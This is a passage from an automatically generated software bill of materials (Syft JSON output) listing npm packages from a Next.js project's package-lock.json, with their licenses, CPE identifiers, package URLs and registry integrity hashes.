LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32-arm64:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32-arm64:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32_arm64:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32_arm64:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-win32-arm64@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-win32-arm64/-/sharp-win32-arm64-0.34.5.tgz","integrity":"sha512-WQ3AgWCWYSb2yt+IG8mnC6Jdk9Whs7O0gxphblsLvdhSpSTtmu69ZG1Gkb6NuvxsNACwiPV6cNSZNzt0KPsw7g==","dependencies":null}},{"id":"8da96e6bc654731f","name":"@img/sharp-win32-ia32","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0 AND LGPL-3.0-or-later","spdxExpression":"Apache-2.0 AND LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32-ia32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32-ia32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32_ia32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32_ia32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-win32-ia32@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-win32-ia32/-/sharp-win32-ia32-0.34.5.tgz","integrity":"sha512-FV9m/7NmeCmSHDD5j4+4pNI8Cp3aW+JvLoXcTUo0IqyjSfAZJ8dIUmijx1qaJsIiU+Hosw6xM5KijAWRJCSgNg==","dependencies":null}},{"id":"e8052476c35410ff","name":"@img/sharp-win32-x64","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0 AND LGPL-3.0-or-later","spdxExpression":"Apache-2.0 AND LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32-x64:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32-x64:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32_x64:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32_x64:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-win32-x64@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-win32-x64/-/sharp-win32-x64-0.34.5.tgz","integrity":"sha512-+29YMsqY2/9eFEiW93eqWnuLcWcufowXewwSNIT6UwZdUUCrM3oFjMWH/Z6/TMmb4hlFenmfAVbpWeup2jryCw==","dependencies":null}},{"id":"58cb7ee4da366532","name":"@ioredis/commands","version":"1.5.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@ioredis\\/commands:\\@ioredis\\/commands:1.5.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40ioredis/commands@1.5.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@ioredis/commands/-/commands-1.5.1.tgz","integrity":"sha512-JH8ZL/ywcJyR9MmJ5BNqZllXNZQqQbnVZOqpPQqE1vHiFgAw4NHbvE0FOduNU8IX9babitBT46571OnPTT0Zcw==","dependencies":null}},{"id":"1157d16cad8b2ffc","name":"@isaacs/cliui","version":"8.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@isaacs\\/cliui:\\@isaacs\\/cliui:8.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40isaacs/cliui@8.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz","integrity":"sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==","dependencies":{"string-width":"^5.1.2","string-width-cjs":"npm:string-width@^4.2.0","strip-ansi":"^7.0.1","strip-ansi-cjs":"npm:strip-ansi@^6.0.1","wrap-ansi":"^8.1.0","wrap-ansi-cjs":"npm:wrap-ansi@^7.0.0"}}},{"id":"93582717df76767f","name":"@jridgewell/gen-mapping","version":"0.3.13","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@jridgewell\\/gen-mapping:\\@jridgewell\\/gen-mapping:0.3.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/gen-mapping:\\@jridgewell\\/gen_mapping:0.3.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/gen_mapping:\\@jridgewell\\/gen-mapping:0.3.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/gen_mapping:\\@jridgewell\\/gen_mapping:0.3.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/gen:\\@jridgewell\\/gen-mapping:0.3.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/gen:\\@jridgewell\\/gen_mapping:0.3.13:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40jridgewell/gen-mapping@0.3.13","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.13.tgz","integrity":"sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==","dependencies":{"@jridgewell/sourcemap-codec":"^1.5.0","@jridgewell/trace-mapping":"^0.3.24"}}},{"id":"82452eb5459f3fba","name":"@jridgewell/resolve-uri","version":"3.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@jridgewell\\/resolve-uri:\\@jridgewell\\/resolve-uri:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/resolve-uri:\\@jridgewell\\/resolve_uri:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/resolve_uri:\\@jridgewell\\/resolve-uri:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/resolve_uri:\\@jridgewell\\/resolve_uri:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/resolve:\\@jridgewell\\/resolve-uri:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/resolve:\\@jridgewell\\/resolve_uri:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40jridgewell/resolve-uri@3.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz","integrity":"sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==","dependencies":null}},{"id":"47804e8101ff9015","name":"@jridgewell/sourcemap-codec","version":"1.5.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@jridgewell\\/sourcemap-codec:\\@jridgewell\\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/sourcemap-codec:\\@jridgewell\\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/sourcemap_codec:\\@jridgewell\\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/sourcemap_codec:\\@jridgewell\\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/sourcemap:\\@jridgewell\\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/sourcemap:\\@jridgewell\\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40jridgewell/sourcemap-codec@1.5.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz","integrity":"sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og==","dependencies":null}},{"id":"d2b0bb94bbc32d3e","name":"@jridgewell/trace-mapping","version":"0.3.31","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@jridgewell\\/trace-mapping:\\@jridgewell\\/trace-mapping:0.3.31:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/trace-mapping:\\@jridgewell\\/trace_mapping:0.3.31:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/trace_mapping:\\@jridgewell\\/trace-mapping:0.3.31:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/trace_mapping:\\@jridgewell\\/trace_mapping:0.3.31:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/trace:\\@jridgewell\\/trace-mapping:0.3.31:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@jridgewell\\/trace:\\@jridgewell\\/trace_mapping:0.3.31:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40jridgewell/trace-mapping@0.3.31","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.31.tgz","integrity":"sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw==","dependencies":{"@jridgewell/resolve-uri":"^3.1.0","@jridgewell/sourcemap-codec":"^1.4.14"}}},{"id":"886fcbec7936d83f","name":"@js-sdsl/ordered-map","version":"4.4.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@js-sdsl\\/ordered-map:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@js-sdsl\\/ordered-map:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@js_sdsl\\/ordered_map:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@js_sdsl\\/ordered_map:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@js-sdsl\\/ordered:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@js-sdsl\\/ordered:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@js_sdsl\\/ordered:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@js_sdsl\\/ordered:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@js:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@js:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40js-sdsl/ordered-map@4.4.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@js-sdsl/ordered-map/-/ordered-map-4.4.2.tgz","integrity":"sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw==","dependencies":null}},{"id":"18ad44792e37660e","name":"@next/env","version":"14.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@next\\/env:\\@next\\/env:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40next/env@14.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@next/env/-/env-14.2.3.tgz","integrity":"sha512-W7fd7IbkfmeeY2gXrzJYDx8D2lWKbVoTIj1o1ScPHNzvp30s1AuoEFSdr39bC5sjxJaxTtq3OTCZboNp0lNWHA==","dependencies":null}},{"id":"bdb25bdc1adfe20f","name":"@next/swc-darwin-arm64","version":"14.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@next\\/swc-darwin-arm64:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-darwin-arm64:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_darwin_arm64:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_darwin_arm64:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40next/swc-darwin-arm64@14.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@next/swc-darwin-arm64/-/swc-darwin-arm64-14.2.3.tgz","integrity":"sha512-3pEYo/RaGqPP0YzwnlmPN2puaF2WMLM3apt5jLW2fFdXD9+pqcoTzRk+iZsf8ta7+quAe4Q6Ms0nR0SFGFdS1A==","dependencies":null}},{"id":"b0a8be32ec095ef0","name":"@next/swc-darwin-x64","version":"14.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@next\\/swc-darwin-x64:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-darwin-x64:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_darwin_x64:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_darwin_x64:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40next/swc-darwin-x64@14.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@next/swc-darwin-x64/-/swc-darwin-x64-14.2.3.tgz","integrity":"sha512-6adp7waE6P1TYFSXpY366xwsOnEXM+y1kgRpjSRVI2CBDOcbRjsJ67Z6EgKIqWIue52d2q/Mx8g9MszARj8IEA==","dependencies":null}},{"id":"b768ca89954904c7","name":"@next/swc-linux-arm64-gnu","version":"14.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-arm64-gnu:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-arm64-gnu:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_arm64_gnu:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_arm64_gnu:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40next/swc-linux-arm64-gnu@14.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@next/swc-linux-arm64-gnu/-/swc-linux-arm64-gnu-14.2.3.tgz","integrity":"sha512-cuzCE/1G0ZSnTAHJPUT1rPgQx1w5tzSX7POXSLaS7w2nIUJUD+e25QoXD/hMfxbsT9rslEXugWypJMILBj/QsA==","dependencies":null}},{"id":"f485e6463dfab8af","name":"@next/swc-linux-arm64-musl","version":"14.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-arm64-musl:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-arm64-musl:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_arm64_musl:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc_linux_arm64_musl:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*: